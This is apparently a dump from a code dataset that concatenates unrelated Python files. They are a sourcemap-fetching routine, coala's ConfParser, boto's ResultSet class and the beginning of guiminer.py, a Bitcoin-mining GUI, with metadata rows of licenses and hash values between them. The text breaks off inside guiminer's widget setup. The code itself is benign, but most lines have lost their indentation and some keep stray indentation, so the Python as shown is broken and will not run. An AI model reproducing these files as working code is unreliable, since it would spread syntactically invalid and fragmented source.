'type': EventError.JS_MISSING_SOURCE,
'url': abs_path.encode('utf-8'),
})
# Store original data in annotation
frame.data = {
'orig_lineno': frame.lineno,
'orig_colno': frame.colno,
'orig_function': frame.function,
'orig_abs_path': frame.abs_path,
'orig_filename': frame.filename,
'sourcemap': sourcemap_label,
}
                # SourceMaps return zero-indexed line numbers
frame.lineno = state.src_line + 1
frame.colno = state.src_col
# The offending function is always the previous function in the stack
                # Honestly, no idea what the bottom-most frame is, so we're ignoring that atm
if last_state:
frame.function = last_state.name or frame.function
else:
frame.function = state.name or frame.function
filename = state.src
# special case webpack support
if filename.startswith('webpack://'):
abs_path = filename
# webpack seems to use ~ to imply "relative to resolver root"
# which is generally seen for third party deps
# (i.e. node_modules)
if '/~/' in filename:
filename = '~/' + abs_path.split('/~/', 1)[-1]
else:
filename = filename.split('webpack:///', 1)[-1]
frame.abs_path = abs_path
frame.filename = filename
if abs_path.startswith(('http:', 'https:')):
frame.module = generate_module(abs_path)
elif sourcemap_url:
frame.data = {
'sourcemap': sourcemap_url,
}
# TODO: theoretically a minified source could point to another mapped, minified source
frame.pre_context, frame.context_line, frame.post_context = get_source_context(
source=source, lineno=frame.lineno, colno=frame.colno or 0)
return all_errors
def populate_source_cache(self, project, frames, release):
pending_file_list = set()
done_file_list = set()
sourcemap_capable = set()
cache = self.cache
sourcemaps = self.sourcemaps
for f in frames:
pending_file_list.add(f.abs_path)
if f.colno is not None:
sourcemap_capable.add(f.abs_path)
idx = 0
while pending_file_list:
idx += 1
filename = pending_file_list.pop()
done_file_list.add(filename)
if idx > self.max_fetches:
cache.add_error(filename, {
'type': EventError.JS_TOO_MANY_REMOTE_SOURCES,
})
continue
# TODO: respect cache-control/max-age headers to some extent
logger.debug('Fetching remote source %r', filename)
try:
result = fetch_url(filename, project=project, release=release)
except BadSource as exc:
cache.add_error(filename, exc.data)
continue
cache.add(filename, result.body.splitlines())
cache.alias(result.url, filename)
sourcemap_url = discover_sourcemap(result)
if not sourcemap_url:
continue
            # If we didn't have a colno, a sourcemap won't do us any good
if filename not in sourcemap_capable:
cache.add_error(filename, {
'type': EventError.JS_NO_COLUMN,
'url': filename,
})
continue
logger.debug('Found sourcemap %r for minified script %r', sourcemap_url[:256], result.url)
sourcemaps.link(filename, sourcemap_url)
if sourcemap_url in sourcemaps:
continue
# pull down sourcemap
try:
sourcemap_idx = fetch_sourcemap(
sourcemap_url,
project=project,
release=release,
)
except BadSource as exc:
cache.add_error(filename, exc.data)
continue
sourcemaps.add(sourcemap_url, sourcemap_idx)
# queue up additional source files for download
for source in sourcemap_idx.sources:
next_filename = urljoin(sourcemap_url, source)
if next_filename not in done_file_list:
if source in sourcemap_idx.content:
cache.add(next_filename, sourcemap_idx.content[source])
done_file_list.add(next_filename)
else:
pending_file_list.add(next_filename)
| bsd-3-clause | 8,830,881,345,056,043,000 | 33.015723 | 117 | 0.569705 | false |
IPMITMO/statan | coala/coalib/parsing/ConfParser.py | 24 | 6164 | import os
from collections import OrderedDict
from types import MappingProxyType
import logging
from coalib.misc import Constants
from coalib.parsing.LineParser import LineParser
from coalib.settings.Section import Section
from coalib.settings.Setting import Setting
class ConfParser:
def __init__(self,
key_value_delimiters=('=',),
comment_seperators=('#',),
key_delimiters=(',', ' '),
section_name_surroundings=MappingProxyType({'[': ']'}),
remove_empty_iter_elements=True,
key_value_append_delimiters=('+=',)):
self.line_parser = LineParser(
key_value_delimiters,
comment_seperators,
key_delimiters,
section_name_surroundings,
key_value_append_delimiters=key_value_append_delimiters)
self.__remove_empty_iter_elements = remove_empty_iter_elements
# Declare it
self.sections = None
self.__rand_helper = None
self.__init_sections()
def parse(self, input_data, overwrite=False):
"""
Parses the input and adds the new data to the existing.
        :param input_data: The file to parse from. If a directory is
                           given, the default coafile inside it is
                           parsed instead.
:param overwrite: If True, wipes all existing Settings inside this
instance and adds only the newly parsed ones. If
False, adds the newly parsed data to the existing
one (and overwrites already existing keys with the
newly parsed values).
:return: A dictionary with (lowercase) section names as keys
and their Setting objects as values.
"""
if os.path.isdir(input_data):
input_data = os.path.join(input_data, Constants.default_coafile)
with open(input_data, 'r', encoding='utf-8') as _file:
lines = _file.readlines()
if overwrite:
self.__init_sections()
self.__parse_lines(lines, input_data)
return self.sections
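    # Usage sketch (hypothetical path; as documented above, a directory
    # may also be passed, in which case its default coafile is parsed):
    #
    #     parser = ConfParser()
    #     sections = parser.parse('/path/to/.coafile')
    #     default_section = parser.get_section('default')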
def get_section(self, name, create_if_not_exists=False):
key = self.__refine_key(name)
sec = self.sections.get(key, None)
if sec is not None:
return sec
if not create_if_not_exists:
raise IndexError
retval = self.sections[key] = Section(str(name))
return retval
@staticmethod
def __refine_key(key):
return str(key).lower().strip()
def __add_comment(self, section, comment, origin):
key = 'comment' + str(self.__rand_helper)
self.__rand_helper += 1
section.append(Setting(
key,
comment,
origin,
remove_empty_iter_elements=self.__remove_empty_iter_elements))
def __parse_lines(self, lines, origin):
current_section_name = 'default'
current_section = self.get_section(current_section_name)
current_keys = []
no_section = True
for line in lines:
(section_name,
keys,
value,
append,
comment) = self.line_parser._parse(line)
if comment != '':
self.__add_comment(current_section, comment, origin)
if section_name != '':
no_section = False
current_section_name = section_name
current_section = self.get_section(current_section_name, True)
current_keys = []
continue
if comment == '' and keys == [] and value == '':
self.__add_comment(current_section, '', origin)
continue
if keys != []:
current_keys = keys
for section_override, key in current_keys:
if no_section:
                logging.warning('A setting does not have a section. '
                                'This is a deprecated feature, please '
                                'put this setting in a section defined '
                                'with `[<your-section-name>]` in a '
                                'configuration file.')
if key == '':
continue
if key in current_section.contents and keys != []:
logging.warning('{} setting has already been defined in '
'section {}. The previous setting will be '
'overridden.'.format(key,
current_section.name))
if section_override == '':
current_section.add_or_create_setting(
Setting(key,
value,
origin,
to_append=append,
# Start ignoring PEP8Bear, PycodestyleBear*
# they fail to resolve this
remove_empty_iter_elements=
self.__remove_empty_iter_elements),
# Stop ignoring
allow_appending=(keys == []))
else:
self.get_section(
section_override,
True).add_or_create_setting(
Setting(key,
value,
origin,
to_append=append,
# Start ignoring PEP8Bear, PycodestyleBear*
# they fail to resolve this
remove_empty_iter_elements=
self.__remove_empty_iter_elements),
# Stop ignoring
allow_appending=(keys == []))
def __init_sections(self):
self.sections = OrderedDict()
self.sections['default'] = Section('Default')
self.__rand_helper = 0
| mit | -7,632,719,172,983,834,000 | 37.049383 | 79 | 0.483777 | false |
nanocell/lsync | python/boto/resultset.py | 4 | 6186 | # Copyright (c) 2006,2007 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from boto.s3.user import User
class ResultSet(list):
"""
The ResultSet is used to pass results back from the Amazon services
    to the client. It is a light wrapper around Python's :py:class:`list` class,
with some additional methods for parsing XML results from AWS.
Because I don't really want any dependencies on external libraries,
I'm using the standard SAX parser that comes with Python. The good news is
that it's quite fast and efficient but it makes some things rather
difficult.
You can pass in, as the marker_elem parameter, a list of tuples.
Each tuple contains a string as the first element which represents
the XML element that the resultset needs to be on the lookout for
and a Python class as the second element of the tuple. Each time the
specified element is found in the XML, a new instance of the class
will be created and popped onto the stack.
:ivar str next_token: A hash used to assist in paging through very long
result sets. In most cases, passing this value to certain methods
will give you another 'page' of results.
"""
def __init__(self, marker_elem=None):
list.__init__(self)
if isinstance(marker_elem, list):
self.markers = marker_elem
else:
self.markers = []
self.marker = None
self.key_marker = None
self.next_marker = None # avail when delimiter used
self.next_key_marker = None
self.next_upload_id_marker = None
self.next_version_id_marker = None
self.version_id_marker = None
self.is_truncated = False
self.next_token = None
self.status = True
def startElement(self, name, attrs, connection):
for t in self.markers:
if name == t[0]:
obj = t[1](connection)
self.append(obj)
return obj
if name == 'Owner':
# Makes owner available for get_service and
# perhaps other lists where not handled by
# another element.
self.owner = User()
return self.owner
return None
def to_boolean(self, value, true_value='true'):
if value == true_value:
return True
else:
return False
def endElement(self, name, value, connection):
if name == 'IsTruncated':
self.is_truncated = self.to_boolean(value)
elif name == 'Marker':
self.marker = value
elif name == 'KeyMarker':
self.key_marker = value
elif name == 'NextMarker':
self.next_marker = value
elif name == 'NextKeyMarker':
self.next_key_marker = value
elif name == 'VersionIdMarker':
self.version_id_marker = value
elif name == 'NextVersionIdMarker':
self.next_version_id_marker = value
elif name == 'UploadIdMarker':
self.upload_id_marker = value
elif name == 'NextUploadIdMarker':
self.next_upload_id_marker = value
elif name == 'Bucket':
self.bucket = value
elif name == 'MaxUploads':
self.max_uploads = int(value)
elif name == 'MaxItems':
self.max_items = int(value)
elif name == 'Prefix':
self.prefix = value
elif name == 'return':
self.status = self.to_boolean(value)
elif name == 'StatusCode':
self.status = self.to_boolean(value, 'Success')
elif name == 'ItemName':
self.append(value)
elif name == 'NextToken':
self.next_token = value
elif name == 'BoxUsage':
try:
connection.box_usage += float(value)
except:
pass
elif name == 'IsValid':
self.status = self.to_boolean(value, 'True')
else:
setattr(self, name, value)
class BooleanResult(object):
def __init__(self, marker_elem=None):
self.status = True
self.request_id = None
self.box_usage = None
def __repr__(self):
if self.status:
return 'True'
else:
return 'False'
def __nonzero__(self):
return self.status
def startElement(self, name, attrs, connection):
return None
def to_boolean(self, value, true_value='true'):
if value == true_value:
return True
else:
return False
def endElement(self, name, value, connection):
if name == 'return':
self.status = self.to_boolean(value)
elif name == 'StatusCode':
self.status = self.to_boolean(value, 'Success')
elif name == 'IsValid':
self.status = self.to_boolean(value, 'True')
elif name == 'RequestId':
self.request_id = value
elif name == 'requestId':
self.request_id = value
elif name == 'BoxUsage':
            self.box_usage = value
else:
setattr(self, name, value)
| gpl-3.0 | 7,787,772,964,696,987,000 | 36.041916 | 79 | 0.606693 | false |
dpk9/poclbm | guiminer.py | 2 | 101317 | #!/usr/bin/python
"""GUIMiner - graphical frontend to Bitcoin miners.
Currently supports:
- m0mchil's "poclbm"
- puddinpop's "rpcminer"
- ufasoft's "bitcoin-miner"
Copyright 2011-2012 Chris MacLeod
This program is released under the GNU GPL. See LICENSE.txt for details.
"""
import sys, os, subprocess, errno, re, threading, logging, time, httplib, urllib
import wx
import json
import collections
try:
import win32api, win32con, win32process
except ImportError:
pass
from wx.lib.agw import flatnotebook as fnb
from wx.lib.agw import hyperlink
from wx.lib.newevent import NewEvent
__version__ = '2012-12-03'
def get_module_path():
"""Return the folder containing this script (or its .exe)."""
module_name = sys.executable if hasattr(sys, 'frozen') else __file__
abs_path = os.path.abspath(module_name)
return os.path.dirname(abs_path)
USE_MOCK = '--mock' in sys.argv
# Set up localization; requires the app to be created
app = wx.PySimpleApp(0)
wx.InitAllImageHandlers()
_ = wx.GetTranslation
LANGUAGES = {
"Chinese Simplified": wx.LANGUAGE_CHINESE_SIMPLIFIED,
"Dutch": wx.LANGUAGE_DUTCH,
"English": wx.LANGUAGE_ENGLISH,
"Esperanto": wx.LANGUAGE_ESPERANTO,
"French": wx.LANGUAGE_FRENCH,
"German": wx.LANGUAGE_GERMAN,
"Hungarian": wx.LANGUAGE_HUNGARIAN,
"Italian": wx.LANGUAGE_ITALIAN,
"Portuguese": wx.LANGUAGE_PORTUGUESE,
"Russian": wx.LANGUAGE_RUSSIAN,
"Spanish": wx.LANGUAGE_SPANISH,
}
LANGUAGES_REVERSE = dict((v, k) for (k, v) in LANGUAGES.items())
DONATION_ADDRESS = "1MDDh2h4cAZDafgc94mr9q95dhRYcJbNQo"
locale = None
language = None
def update_language(new_language):
global locale, language
language = new_language
if locale:
del locale
locale = wx.Locale(language)
if locale.IsOk():
locale.AddCatalogLookupPathPrefix(os.path.join(get_module_path(), "locale"))
locale.AddCatalog("guiminer")
else:
locale = None
def load_language():
language_config = os.path.join(get_module_path(), 'default_language.ini')
language_data = dict()
if os.path.exists(language_config):
with open(language_config) as f:
language_data.update(json.load(f))
language_str = language_data.get('language', "English")
update_language(LANGUAGES.get(language_str, wx.LANGUAGE_ENGLISH))
def save_language():
language_config = os.path.join(get_module_path(), 'default_language.ini')
language_str = LANGUAGES_REVERSE.get(language)
with open(language_config, 'w') as f:
json.dump(dict(language=language_str), f)
load_language()
ABOUT_TEXT = _(
"""GUIMiner
Version: %(version)s
GUI by Chris 'Kiv' MacLeod
Original poclbm miner by m0mchil
Original rpcminer by puddinpop
Get the source code or file issues at GitHub:
https://github.com/Kiv/poclbm
If you enjoyed this software, support its development
by donating to:
%(address)s
Even a single Bitcoin is appreciated and helps motivate
further work on this software.
""")
# Translatable strings that are used repeatedly
STR_NOT_STARTED = _("Not started")
STR_STARTING = _("Starting...")
STR_STOPPED = _("Stopped")
STR_PAUSED = _("Paused")
STR_START_MINING = _("Start mining!")
STR_STOP_MINING = _("Stop mining")
STR_REFRESH_BALANCE = _("Refresh balance")
STR_CONNECTION_ERROR = _("Connection error")
STR_USERNAME = _("Username:")
STR_PASSWORD = _("Password:")
STR_QUIT = _("Quit this program")
STR_ABOUT = _("Show about dialog")
# Alternate backends that we know how to call
SUPPORTED_BACKENDS = [
"rpcminer-4way.exe",
"rpcminer-cpu.exe",
"rpcminer-cuda.exe",
"rpcminer-opencl.exe",
# "phoenix.py",
# "phoenix.exe",
"bitcoin-miner.exe"
]
USER_AGENT = "guiminer/" + __version__
# Time constants
SAMPLE_TIME_SECS = 3600
REFRESH_RATE_MILLIS = 2000
# Layout constants
LBL_STYLE = wx.ALIGN_RIGHT | wx.ALIGN_CENTER_VERTICAL
BTN_STYLE = wx.ALIGN_CENTER_HORIZONTAL | wx.ALL
# Events sent from the worker threads
(UpdateHashRateEvent, EVT_UPDATE_HASHRATE) = NewEvent()
(UpdateAcceptedEvent, EVT_UPDATE_ACCEPTED) = NewEvent()
(UpdateSoloCheckEvent, EVT_UPDATE_SOLOCHECK) = NewEvent()
(UpdateStatusEvent, EVT_UPDATE_STATUS) = NewEvent()
# Utility functions
def merge_whitespace(s):
"""Combine multiple whitespace characters found in s into one."""
s = re.sub(r"( +)|\t+", " ", s)
return s.strip()
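# Illustrative: merge_whitespace('GeForce   GTX\t570 ') -> 'GeForce GTX 570'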
def get_opencl_devices():
"""Return a list of available OpenCL devices.
Raises ImportError if OpenCL is not found.
Raises IOError if no OpenCL devices are found.
"""
import pyopencl
device_strings = []
platforms = pyopencl.get_platforms() #@UndefinedVariable
for i, platform in enumerate(platforms):
devices = platform.get_devices()
for j, device in enumerate(devices):
device_strings.append('[%d-%d] %s' %
(i, j, merge_whitespace(device.name)[:25]))
if len(device_strings) == 0:
raise IOError
return device_strings
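# Usage sketch (device strings look like '[0-0] GeForce GTX 570'; both
# exceptions are documented above):
#
#     try:
#         devices = get_opencl_devices()
#     except (ImportError, IOError):
#         devices = []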
def get_icon_bundle():
"""Return the Bitcoin program icon bundle."""
return wx.IconBundleFromFile(os.path.join(get_module_path(), "logo.ico"), wx.BITMAP_TYPE_ICO)
def get_taskbar_icon():
"""Return the taskbar icon.
    This works around Windows' annoying behavior of ignoring the 16x16 image
and using nearest neighbour downsampling on the 32x32 image instead."""
ib = get_icon_bundle()
return ib.GetIcon((16, 16))
def mkdir_p(path):
"""If the directory 'path' doesn't exist, create it. Same as mkdir -p."""
try:
os.makedirs(path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
def add_tooltip(widget, text):
"""Add a tooltip to widget with the specified text."""
tooltip = wx.ToolTip(text)
widget.SetToolTip(tooltip)
def format_khash(rate):
"""Format rate for display. A rate of 0 means just connected."""
if rate > 10 ** 6:
return _("%.3f Ghash/s") % (rate / 1000000.)
if rate > 10 ** 3:
return _("%.1f Mhash/s") % (rate / 1000.)
elif rate == 0:
return _("Connecting...")
else:
return _("%d khash/s") % rate
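# Examples with the English locale:
#     format_khash(1500000) -> '1.500 Ghash/s'
#     format_khash(1500)    -> '1.5 Mhash/s'
#     format_khash(0)       -> 'Connecting...'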
def format_balance(amount):
"""Format a quantity of Bitcoins in BTC."""
return "%.3f BTC" % float(amount)
def init_logger():
"""Set up and return the logging object and custom formatter."""
logger = logging.getLogger("poclbm-gui")
logger.setLevel(logging.DEBUG)
file_handler = logging.FileHandler(
os.path.join(get_module_path(), 'guiminer.log'), 'w')
formatter = logging.Formatter("%(asctime)s: %(message)s",
"%Y-%m-%d %H:%M:%S")
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
return logger, formatter
logger, formatter = init_logger()
def http_request(hostname, *args, **kwargs):
"""Do a HTTP request and return the response data."""
conn_cls = httplib.HTTPSConnection if kwargs.get('use_https') else httplib.HTTPConnection
conn = conn_cls(hostname)
try:
logger.debug(_("Requesting balance: %(request)s"), dict(request=args))
conn.request(*args)
response = conn.getresponse()
data = response.read()
logger.debug(_("Server replied: %(status)s, %(data)s"),
dict(status=str(response.status), data=data))
return response, data
finally:
conn.close()
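# Usage sketch (hypothetical host and path; the extra positional args are
# passed straight through to httplib's request()):
#
#     response, body = http_request('example.com', 'GET', '/balance',
#                                   use_https=True)
#     if response.status == 200:
#         info = json.loads(body)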
def get_process_affinity(pid):
"""Return the affinity mask for the specified process."""
flags = win32con.PROCESS_QUERY_INFORMATION
handle = win32api.OpenProcess(flags, 0, pid)
return win32process.GetProcessAffinityMask(handle)[0]
def set_process_affinity(pid, mask):
"""Set the affinity for process to mask."""
flags = win32con.PROCESS_QUERY_INFORMATION | win32con.PROCESS_SET_INFORMATION
handle = win32api.OpenProcess(flags, 0, pid)
win32process.SetProcessAffinityMask(handle, mask)
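# The mask is a bit field where bit i enables CPU core i. Sketch, assuming
# pywin32 is available and `pid` is a valid process id:
#
#     set_process_affinity(pid, 0b0011)  # restrict to cores 0 and 1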
def find_nth(haystack, needle, n):
"""Return the index of the nth occurrence of needle in haystack."""
start = haystack.find(needle)
while start >= 0 and n > 1:
start = haystack.find(needle, start + len(needle))
n -= 1
return start
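# e.g. find_nth('a\nb\nc', '\n', 2) == 3 (index of the second newline)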
class ConsolePanel(wx.Panel):
"""Panel that displays logging events.
Uses with a StreamHandler to log events to a TextCtrl. Thread-safe.
"""
def __init__(self, parent, n_max_lines):
wx.Panel.__init__(self, parent, -1)
self.parent = parent
self.n_max_lines = n_max_lines
vbox = wx.BoxSizer(wx.VERTICAL)
style = wx.TE_MULTILINE | wx.TE_READONLY | wx.HSCROLL
self.text = wx.TextCtrl(self, -1, "", style=style)
vbox.Add(self.text, 1, wx.EXPAND)
self.SetSizer(vbox)
self.handler = logging.StreamHandler(self)
formatter = logging.Formatter("%(asctime)s: %(message)s",
"%Y-%m-%d %H:%M:%S")
self.handler.setFormatter(formatter)
logger.addHandler(self.handler)
def on_focus(self):
"""On focus, clear the status bar."""
self.parent.statusbar.SetStatusText("", 0)
self.parent.statusbar.SetStatusText("", 1)
def on_close(self):
"""On closing, stop handling logging events."""
logger.removeHandler(self.handler)
def append_text(self, text):
self.text.AppendText(text)
lines_to_cut = self.text.GetNumberOfLines() - self.n_max_lines
if lines_to_cut > 0:
contents = self.text.GetValue()
position = find_nth(contents, '\n', lines_to_cut)
self.text.ChangeValue(contents[position + 1:])
def write(self, text):
"""Forward logging events to our TextCtrl."""
wx.CallAfter(self.append_text, text)
class SummaryPanel(wx.Panel):
"""Panel that displays a summary of all miners."""
def __init__(self, parent):
wx.Panel.__init__(self, parent, -1)
self.parent = parent
self.timer = wx.Timer(self)
self.timer.Start(REFRESH_RATE_MILLIS)
self.Bind(wx.EVT_TIMER, self.on_timer)
flags = wx.ALIGN_CENTER_HORIZONTAL | wx.ALL
border = 5
self.column_headers = [
(wx.StaticText(self, -1, _("Miner")), 0, flags, border),
(wx.StaticText(self, -1, _("Speed")), 0, flags, border),
(wx.StaticText(self, -1, _("Accepted")), 0, flags, border),
(wx.StaticText(self, -1, _("Stale")), 0, flags, border),
(wx.StaticText(self, -1, _("Start/Stop")), 0, flags, border),
(wx.StaticText(self, -1, _("Autostart")), 0, flags, border),
]
font = wx.SystemSettings_GetFont(wx.SYS_DEFAULT_GUI_FONT)
font.SetUnderlined(True)
for st in self.column_headers:
st[0].SetFont(font)
self.grid = wx.FlexGridSizer(0, len(self.column_headers), 2, 2)
self.grid.AddMany(self.column_headers)
self.add_miners_to_grid()
self.grid.AddGrowableCol(0)
self.grid.AddGrowableCol(1)
self.grid.AddGrowableCol(2)
self.grid.AddGrowableCol(3)
self.SetSizer(self.grid)
def add_miners_to_grid(self):
"""Add a summary row for each miner to the summary grid."""
# Remove any existing widgets except the column headers.
for i in reversed(range(len(self.column_headers), len(self.grid.GetChildren()))):
self.grid.Hide(i)
self.grid.Remove(i)
for p in self.parent.profile_panels:
p.clear_summary_widgets()
self.grid.AddMany(p.get_summary_widgets(self))
self.grid.Layout()
def on_close(self):
self.timer.Stop()
def on_timer(self, event=None):
"""Whenever the timer goes off, fefresh the summary data."""
if self.parent.nb.GetSelection() != self.parent.nb.GetPageIndex(self):
return
for p in self.parent.profile_panels:
p.update_summary()
self.parent.statusbar.SetStatusText("", 0) # TODO: show something
total_rate = sum(p.last_rate for p in self.parent.profile_panels
if p.is_mining)
if any(p.is_mining for p in self.parent.profile_panels):
self.parent.statusbar.SetStatusText(format_khash(total_rate), 1)
else:
self.parent.statusbar.SetStatusText("", 1)
def on_focus(self):
"""On focus, show the statusbar text."""
self.on_timer()
class GUIMinerTaskBarIcon(wx.TaskBarIcon):
"""Taskbar icon for the GUI.
Shows status messages on hover and opens on click.
"""
TBMENU_RESTORE = wx.NewId()
TBMENU_PAUSE = wx.NewId()
TBMENU_CLOSE = wx.NewId()
TBMENU_CHANGE = wx.NewId()
TBMENU_REMOVE = wx.NewId()
def __init__(self, frame):
wx.TaskBarIcon.__init__(self)
self.frame = frame
self.icon = get_taskbar_icon()
self.timer = wx.Timer(self)
self.timer.Start(REFRESH_RATE_MILLIS)
self.is_paused = False
self.SetIcon(self.icon, "GUIMiner")
self.imgidx = 1
self.Bind(wx.EVT_TASKBAR_LEFT_DCLICK, self.on_taskbar_activate)
self.Bind(wx.EVT_MENU, self.on_taskbar_activate, id=self.TBMENU_RESTORE)
self.Bind(wx.EVT_MENU, self.on_taskbar_close, id=self.TBMENU_CLOSE)
self.Bind(wx.EVT_MENU, self.on_pause, id=self.TBMENU_PAUSE)
self.Bind(wx.EVT_TIMER, self.on_timer)
def CreatePopupMenu(self):
"""Override from wx.TaskBarIcon. Creates the right-click menu."""
menu = wx.Menu()
menu.AppendCheckItem(self.TBMENU_PAUSE, _("Pause all"))
menu.Check(self.TBMENU_PAUSE, self.is_paused)
menu.Append(self.TBMENU_RESTORE, _("Restore"))
menu.Append(self.TBMENU_CLOSE, _("Close"))
return menu
def on_taskbar_activate(self, evt):
if self.frame.IsIconized():
self.frame.Iconize(False)
if not self.frame.IsShown():
self.frame.Show(True)
self.frame.Raise()
def on_taskbar_close(self, evt):
wx.CallAfter(self.frame.Close, force=True)
def on_timer(self, event):
"""Refresh the taskbar icon's status message."""
objs = self.frame.profile_panels
if objs:
text = '\n'.join(p.get_taskbar_text() for p in objs)
self.SetIcon(self.icon, text)
def on_pause(self, event):
"""Pause or resume the currently running miners."""
self.is_paused = event.Checked()
for miner in self.frame.profile_panels:
if self.is_paused:
miner.pause()
else:
miner.resume()
class MinerListenerThread(threading.Thread):
LINES = [
(r"Target =|average rate|Sending to server|found hash|connected to|Setting server",
lambda _: None), # Just ignore lines like these
(r"accepted|\"result\":\s*true",
lambda _: UpdateAcceptedEvent(accepted=True)),
(r"invalid|stale|rejected", lambda _:
UpdateAcceptedEvent(accepted=False)),
(r"(\d+)\s*khash/s", lambda match:
UpdateHashRateEvent(rate=int(match.group(1)))),
(r"(\d+\.\d+)\s*MH/s", lambda match:
UpdateHashRateEvent(rate=float(match.group(1)) * 1000)),
(r"(\d+\.\d+)\s*Mhash/s", lambda match:
UpdateHashRateEvent(rate=float(match.group(1)) * 1000)),
(r"(\d+)\s*Mhash/s", lambda match:
UpdateHashRateEvent(rate=int(match.group(1)) * 1000)),
(r"checking (\d+)", lambda _:
UpdateSoloCheckEvent()),
]
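    # Each entry above pairs a regex with a factory that builds a wx event
    # from the match; e.g. a backend line such as "1234 khash/s" posts
    # UpdateHashRateEvent(rate=1234) to the MinerTab owning this listener.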
def __init__(self, parent, miner):
threading.Thread.__init__(self)
self.shutdown_event = threading.Event()
self.parent = parent
self.parent_name = parent.name
self.miner = miner
def run(self):
logger.info(_('Listener for "%s" started') % self.parent_name)
while not self.shutdown_event.is_set():
line = self.miner.stdout.readline().strip()
#logger.debug("Line: %s", line)
if not line: continue
for s, event_func in self.LINES: # Use self to allow subclassing
match = re.search(s, line, flags=re.I)
if match is not None:
event = event_func(match)
if event is not None:
wx.PostEvent(self.parent, event)
break
else:
# Possible error or new message, just pipe it through
event = UpdateStatusEvent(text=line)
logger.info(_('Listener for "%(name)s": %(line)s'),
dict(name=self.parent_name, line=line))
wx.PostEvent(self.parent, event)
logger.info(_('Listener for "%s" shutting down'), self.parent_name)
class PhoenixListenerThread(MinerListenerThread):
LINES = [
(r"Result: .* accepted",
lambda _: UpdateAcceptedEvent(accepted=True)),
(r"Result: .* rejected", lambda _:
UpdateAcceptedEvent(accepted=False)),
(r"(\d+)\.?(\d*) Khash/sec", lambda match:
UpdateHashRateEvent(rate=float(match.group(1) + '.' + match.group(2)))),
(r"(\d+)\.?(\d*) Mhash/sec", lambda match:
UpdateHashRateEvent(rate=float(match.group(1) + '.' + match.group(2)) * 1000)),
(r"Currently on block",
lambda _: None), # Just ignore lines like these
]
class CgListenerThread(MinerListenerThread):
LINES = [
(r"Accepted .* GPU \d+ thread \d+",
lambda _: UpdateAcceptedEvent(accepted=True)),
(r"Rejected .* GPU \d+ thread \d+",
lambda _: UpdateAcceptedEvent(accepted=False)),
(r"\(avg\):(\d+)\.?(\d*)Mh/s", lambda match:
UpdateHashRateEvent(rate=float(match.group(1) + '.' + match.group(2)) * 1000)),
(r"^GPU\s*\d+",
lambda _: None), # Just ignore lines like these
]
class MinerTab(wx.Panel):
"""A tab in the GUI representing a miner instance.
Each MinerTab has these responsibilities:
- Persist its data to and from the config file
- Launch a backend subprocess and monitor its progress
by creating a MinerListenerThread.
- Post updates to the GUI's statusbar & summary panel; the format depends
whether the backend is working solo or in a pool.
"""
def __init__(self, parent, id, devices, servers, defaults, statusbar, data):
wx.Panel.__init__(self, parent, id)
self.parent = parent
self.servers = servers
self.defaults = defaults
self.statusbar = statusbar
self.is_mining = False
self.is_paused = False
self.is_possible_error = False
self.miner = None # subprocess.Popen instance when mining
self.miner_listener = None # MinerListenerThread when mining
self.solo_blocks_found = 0
self.accepted_shares = 0 # shares for pool, diff1 hashes for solo
self.accepted_times = collections.deque()
self.invalid_shares = 0
self.invalid_times = collections.deque()
self.last_rate = 0 # units of khash/s
self.autostart = False
self.num_processors = int(os.getenv('NUMBER_OF_PROCESSORS', 1))
self.affinity_mask = 0
self.server_lbl = wx.StaticText(self, -1, _("Server:"))
self.summary_panel = None # SummaryPanel instance if summary open
self.server = wx.ComboBox(self, -1,
choices=[s['name'] for s in servers],
style=wx.CB_READONLY)
self.website_lbl = wx.StaticText(self, -1, _("Website:"))
self.website = hyperlink.HyperLinkCtrl(self, -1, "")
self.external_lbl = wx.StaticText(self, -1, _("Ext. Path:"))
self.txt_external = wx.TextCtrl(self, -1, "")
self.host_lbl = wx.StaticText(self, -1, _("Host:"))
self.txt_host = wx.TextCtrl(self, -1, "")
self.port_lbl = wx.StaticText(self, -1, _("Port:"))
self.txt_port = wx.TextCtrl(self, -1, "")
self.user_lbl = wx.StaticText(self, -1, STR_USERNAME)
self.txt_username = wx.TextCtrl(self, -1, "")
self.pass_lbl = wx.StaticText(self, -1, STR_PASSWORD)
self.txt_pass = wx.TextCtrl(self, -1, "", style=wx.TE_PASSWORD)
self.device_lbl = wx.StaticText(self, -1, _("Device:"))
self.device_listbox = wx.ComboBox(self, -1, choices=devices or [_("No OpenCL devices")], style=wx.CB_READONLY)
self.flags_lbl = wx.StaticText(self, -1, _("Extra flags:"))
self.txt_flags = wx.TextCtrl(self, -1, "")
self.extra_info = wx.StaticText(self, -1, "")
self.affinity_lbl = wx.StaticText(self, -1, _("CPU Affinity:"))
self.affinity_chks = [wx.CheckBox(self, label='%d ' % i)
for i in range(self.num_processors)]
self.balance_lbl = wx.StaticText(self, -1, _("Balance:"))
self.balance_amt = wx.StaticText(self, -1, "0")
self.balance_refresh = wx.Button(self, -1, STR_REFRESH_BALANCE)
self.balance_refresh_timer = wx.Timer()
self.withdraw = wx.Button(self, -1, _("Withdraw"))
self.balance_cooldown_seconds = 0
self.balance_auth_token = ""
self.labels = [self.server_lbl, self.website_lbl,
self.host_lbl, self.port_lbl,
self.user_lbl, self.pass_lbl,
self.device_lbl, self.flags_lbl,
self.balance_lbl]
self.txts = [self.txt_host, self.txt_port,
self.txt_username, self.txt_pass,
self.txt_flags]
self.all_widgets = [self.server, self.website,
self.device_listbox,
self.balance_amt,
self.balance_refresh,
